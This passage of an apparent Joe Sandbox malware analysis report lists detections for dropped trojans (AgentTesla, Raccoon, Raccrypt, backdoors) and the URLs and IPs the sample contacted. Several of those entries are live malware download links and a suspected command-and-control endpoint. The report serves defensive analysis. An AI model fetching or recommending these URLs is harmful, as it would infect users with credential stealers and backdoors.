C:\Users\user\AppData\Local\Temp\B1F6.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\9054.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\CA61.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3D67.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\13E2.exe	46%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\13E2.exe	89%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\2819.exe	46%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\2819.exe	77%	ReversingLabs	Win32.Trojan.Raccoon
C:\Users\user\AppData\Local\Temp\5F8C.exe	29%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\5F8C.exe	81%	ReversingLabs	Win32.Trojan.Raccrypt
C:\Users\user\AppData\Roaming\tiftjuh	66%	ReversingLabs	Win32.Trojan.Raccrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
21.0.tiftjuh.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.0.2819.exe.2080e50.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
32.0.13E2.exe.c80000.2.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
1.1.emPJndhuvA.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.0.tiftjuh.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
30.3.952.exe.5a0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.3.2819.exe.2090000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.0.2819.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
28.0.3D67.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.2.tiftjuh.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.emPJndhuvA.exe.5315a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
32.0.13E2.exe.c80000.3.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
1.0.emPJndhuvA.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
28.1.3D67.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
32.2.13E2.exe.c80000.0.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
22.2.2819.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
44.2.vodibdaj.exe.610000.2.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
1.0.emPJndhuvA.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
30.2.952.exe.580e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.2.2819.exe.2080e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
29.3.FD2B.exe.5a0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
28.0.3D67.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
32.0.13E2.exe.c80000.0.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
1.2.emPJndhuvA.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.tiftjuh.4615a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
25.2.3D67.exe.4615a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
29.2.FD2B.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.1.tiftjuh.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.emPJndhuvA.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
44.2.vodibdaj.exe.540e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
29.2.FD2B.exe.580e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
28.2.3D67.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
28.0.3D67.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
44.3.vodibdaj.exe.560000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
30.2.952.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
22.0.2819.exe.2080e50.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.0.2819.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
44.2.vodibdaj.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
21.0.tiftjuh.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
32.0.13E2.exe.c80000.1.unpack	100%	Avira	HEUR/AGEN.1211353	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://185.7.214.171:8080/6.php	100%	URL Reputation	malware
http://data-host-coin-8.com/files/4918_1642080252_3360.exe	100%	Avira URL Cloud	malware
http://data-host-coin-8.com/files/6961_1642089187_2359.exe	100%	Avira URL Cloud	malware
http://Passport.NET/tbpose	0%	Avira URL Cloud	safe
http://Passport.NET/tb_jz	0%	Avira URL Cloud	safe
http://data-host-coin-8.com/files/8474_1641976243_3082.exe	100%	Avira URL Cloud	malware
http://docs.oasi	0%	Avira URL Cloud	safe
http://docs.sis-op	0%	Avira URL Cloud	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://data-host-coin-8.com/files/9006_1642091568_3496.exe	100%	Avira URL Cloud	malware
http://unicupload.top/install5.exe	100%	URL Reputation	phishing
http://www.w3.or	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://passport.net/tb	0%	Avira URL Cloud	safe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe	100%	Avira URL Cloud	malware
http://Passport.NET/STS%3C/ds:KeyName%3E%3C/ds:KeyInfo%3E%3CCipherData%3E%3CCipherValue%3ECSImQ81IxG	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://Passport.NET/STS09/xmldsig#ripledes-cbc90995-327840285-2659745135-2630312742	0%	Avira URL Cloud	safe
http://data-host-coin-8.com/files/9030_1641816409_7037.exe	100%	Avira URL Cloud	malware
https://dynamic.t	0%	URL Reputation	safe
http://Passport.NET/STS09/xmldsig#ripledes-cbc48496-2624191407-3283318427-1255436723	0%	Avira URL Cloud	safe
http://Passport.NET/tbusi	0%	Avira URL Cloud	safe
http://schemas.mi	0%	URL Reputation	safe
http://host-data-coin-11.com/	0%	URL Reputation	safe
http://Passport.NET/STS	0%	Avira URL Cloud	safe
http://schemas.microso	0%	URL Reputation	safe
http://data-host-coin-8.com/game.exe	0%	URL Reputation	safe
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPF	0%	Avira URL Cloud	safe
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd	0%	Avira URL Cloud	safe
http://dhttp://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
unicupload.top	54.38.220.85	true	false	high
host-data-coin-11.com	45.135.233.182	true	false	high
patmushta.info	194.147.84.248	true	false	high
cdn.discordapp.com	162.159.129.233	true	false	high
privacy-tools-for-you-780.com	45.135.233.182	true	false	high
microsoft-com.mail.protection.outlook.com	52.101.24.0	true	false	high
goo.su	104.21.38.221	true	false	high
transfer.sh	144.76.136.153	true	false	high
a0621298.xsph.ru	141.8.194.74	true	false	high
data-host-coin-8.com	45.135.233.182	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://a0621298.xsph.ru/7.exe	false		high
http://185.7.214.171:8080/6.php	true	URL Reputation: malware	unknown
http://data-host-coin-8.com/files/4918_1642080252_3360.exe	true	Avira URL Cloud: malware	unknown
http://data-host-coin-8.com/files/6961_1642089187_2359.exe	true	Avira URL Cloud: malware	unknown
http://data-host-coin-8.com/files/8474_1641976243_3082.exe	true	Avira URL Cloud: malware	unknown
http://a0621298.xsph.ru/c_setup.exe	false		high
http://a0621298.xsph.ru/3.exe	false		high
http://data-host-coin-8.com/files/9006_1642091568_3496.exe	true	Avira URL Cloud: malware	unknown
http://unicupload.top/install5.exe	true	URL Reputation: phishing	unknown
http://a0621298.xsph.ru/442.exe	false		high
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe	true	Avira URL Cloud: malware	unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe	true	Avira URL Cloud: malware	unknown
http://host-data-coin-11.com/	false	URL Reputation: safe	unknown
http://data-host-coin-8.com/game.exe	false	URL Reputation: safe	unknown
http://a0621298.xsph.ru/RMR.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000E.00000002.308630340.000002DD3283D000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdns:ws	svchost.exe, 0000000A.00000003.302820181.00000159C2990000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000E.00000002.308678325.000002DD3285C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.307948434.000002DD3285A000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000E.00000002.308663972.000002DD3284D000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.307901327.000002DD32847000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000E.00000003.307882060.000002DD32861000.00000004.00000001.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80600mous	svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA	svchost.exe, 0000000A.00000003.303332538.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297742770.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296055205.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302866482.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.311162628.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.291713284.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294135803.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302777888.00000159C2908000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297732317.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295674651.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307752382.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297587146.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295856588.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.299823856.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295834063.00000159C2908000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297445321.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.313032041.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307240286.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285191173.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.313192090.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295969581.00000159C2908000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.302820181.00000159C2990000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318856067.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296120988.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312712162.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.299709872.00000159C2907000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318798282.00000159C2908000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312493661.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.313042176.00000159C2910000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.313208720.00000159C2910000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295756392.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.292025310.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285066185.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297575730.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307165398.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.300117504.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.291939671.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.299941137.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.618112580.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312821276.00000159C2910000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.291902751.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297407218.00000159C2907000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303385751.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312803149.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.313125037.00000159C290F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297961457.00000159C2910000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285037770.00000159C290E000.00000004.00000001.sdmp	false		high
http://Passport.NET/tbpose	svchost.exe, 0000000A.00000002.626072218.00000159C3038000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000E.00000003.307948434.000002DD3285A000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdh	svchost.exe, 0000000A.00000003.297368649.00000159C2969000.00000004.00000001.sdmp	false		high
http://Passport.NET/tb_jz	svchost.exe, 0000000A.00000003.303531645.00000159C30C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	svchost.exe, 0000000A.00000002.622736368.00000159C2937000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000E.00000002.308642618.000002DD32842000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.308085043.000002DD32841000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.308006712.000002DD32840000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdY	svchost.exe, 0000000A.00000003.299859114.00000159C2950000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdk	svchost.exe, 0000000A.00000003.285050178.00000159C2929000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policyccount.	svchost.exe, 0000000A.00000002.622736368.00000159C2937000.00000004.00000001.sdmp	false		high
https://account.live.com/Wizard/Password/Change?id=80601f	svchost.exe, 0000000A.00000003.297762903.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297685112.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297864916.00000159C2949000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA	svchost.exe, 0000000A.00000003.296695303.00000159C2970000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296592771.00000159C295C000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds	svchost.exe, 0000000A.00000003.299859114.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.380385282.00000159C2951000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.300132751.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312027392.00000159C2950000.00000004.00000001.sdmp	false		high
http://docs.oasi	svchost.exe, 0000000A.00000003.312408717.00000159C2951000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309439476.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307263823.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312027392.00000159C2950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.sis-op	svchost.exe, 0000000A.00000003.307401572.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312408717.00000159C2951000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309439476.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307768227.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312027392.00000159C2950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605(	svchost.exe, 0000000A.00000003.296096307.00000159C2959000.00000004.00000001.sdmp	false		high
https://account.live.com/InlineSignup.aspx?iww=1&id=80502	svchost.exe, 0000000A.00000003.296070984.00000159C30F6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.298092187.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281581078.00000159C294C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297762903.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297685112.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297864916.00000159C2949000.00000004.00000001.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80600ymous	svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200	svchost.exe, 0000000A.00000003.312408717.00000159C2951000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000E.00000002.308554216.000002DD32813000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsda	svchost.exe, 0000000A.00000003.318701895.00000159C295E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318361748.00000159C2956000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318891613.00000159C2969000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318751449.00000159C2960000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318640163.00000159C295B000.00000004.00000001.sdmp	false		high
https://signup.live.com/signup.aspxs#	svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp	false		high
https://api.ip.sb/ip	13E2.exe, 00000020.00000002.447751764.0000000004021000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601t	svchost.exe, 0000000A.00000003.298092187.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297762903.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297685112.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297864916.00000159C2949000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000E.00000003.308051051.000002DD32856000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000E.00000002.308630340.000002DD3283D000.00000004.00000001.sdmp	false		high
https://account.live.com/msangcwam	svchost.exe, 0000000A.00000003.281590314.00000159C2929000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295929266.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294086522.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303531645.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.314357417.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.298372199.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294147498.00000159C2967000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281377662.00000159C2977000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296355726.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295947348.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281662678.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285004820.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.569053801.00000159C2243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296239192.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.301112460.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296882891.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.638652990.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297053072.00000159C30C8000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297114349.00000159C30C8000.00000004.00000001.sdmp	false		high
http://www.w3.or	svchost.exe, 0000000A.00000003.318768897.00000159C29B9000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.318715337.00000159C29B7000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000002.00000002.640514055.000001F8DF662000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.597842757.00000159C22E3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://passport.net/tb	svchost.exe, 0000000A.00000003.301140357.00000159C30CC000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.638652990.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.579083943.00000159C2294000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000E.00000002.308630340.000002DD3283D000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.308554216.000002DD32813000.00000004.00000001.sdmp	false		high
http://Passport.NET/STS%3C/ds:KeyName%3E%3C/ds:KeyInfo%3E%3CCipherData%3E%3CCipherValue%3ECSImQ81IxG	svchost.exe, 0000000A.00000002.597842757.00000159C22E3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue	svchost.exe, 0000000A.00000002.622736368.00000159C2937000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-h	svchost.exe, 0000000A.00000003.312408717.00000159C2951000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.312027392.00000159C2950000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 0000000B.00000002.598091083.00000139B4E29000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000E.00000003.307882060.000002DD32861000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000E.00000003.308006712.000002DD32840000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds	svchost.exe, 0000000A.00000003.307401572.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307768227.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307263823.00000159C2948000.00000004.00000001.sdmp	false		high
http://Passport.NET/STS09/xmldsig#ripledes-cbc90995-327840285-2659745135-2630312742	svchost.exe, 0000000A.00000003.377405699.00000159C2955000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000E.00000002.308678325.000002DD3285C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.307948434.000002DD3285A000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000E.00000003.307901327.000002DD32847000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/o	svchost.exe, 0000000A.00000003.285144430.00000159C292E000.00000004.00000001.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80601ssuer	svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000E.00000003.307882060.000002DD32861000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	svchost.exe, 0000000A.00000003.296882891.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.638652990.00000159C30C6000.00000004.00000001.sdmp	false		high
https://account.live.com/msangcwams	svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trustQQUSI	svchost.exe, 0000000A.00000003.377405699.00000159C2955000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000E.00000002.308678325.000002DD3285C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.307948434.000002DD3285A000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trustn	svchost.exe, 0000000A.00000002.619035755.00000159C2913000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-2000	svchost.exe, 0000000A.00000003.307843725.00000159C2969000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtps:/	svchost.exe, 0000000A.00000003.296428257.00000159C2982000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296355726.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296850763.00000159C298B000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000E.00000002.308678325.000002DD3285C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.307948434.000002DD3285A000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000E.00000003.307948434.000002DD3285A000.00000004.00000001.sdmp	false		high
http://Passport.NET/STS09/xmldsig#ripledes-cbc48496-2624191407-3283318427-1255436723	svchost.exe, 0000000A.00000003.313395625.00000159C295F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://Passport.NET/tbusi	svchost.exe, 0000000A.00000003.314357417.00000159C30C7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.mi	svchost.exe, 0000000A.00000003.418201197.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.380265933.00000159C2989000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/scicy	svchost.exe, 0000000A.00000002.622736368.00000159C2937000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000E.00000003.307882060.000002DD32861000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000E.00000002.308630340.000002DD3283D000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd23	svchost.exe, 0000000A.00000003.313395625.00000159C295F000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA	svchost.exe, 0000000A.00000003.296695303.00000159C2970000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296592771.00000159C295C000.00000004.00000001.sdmp	false		high
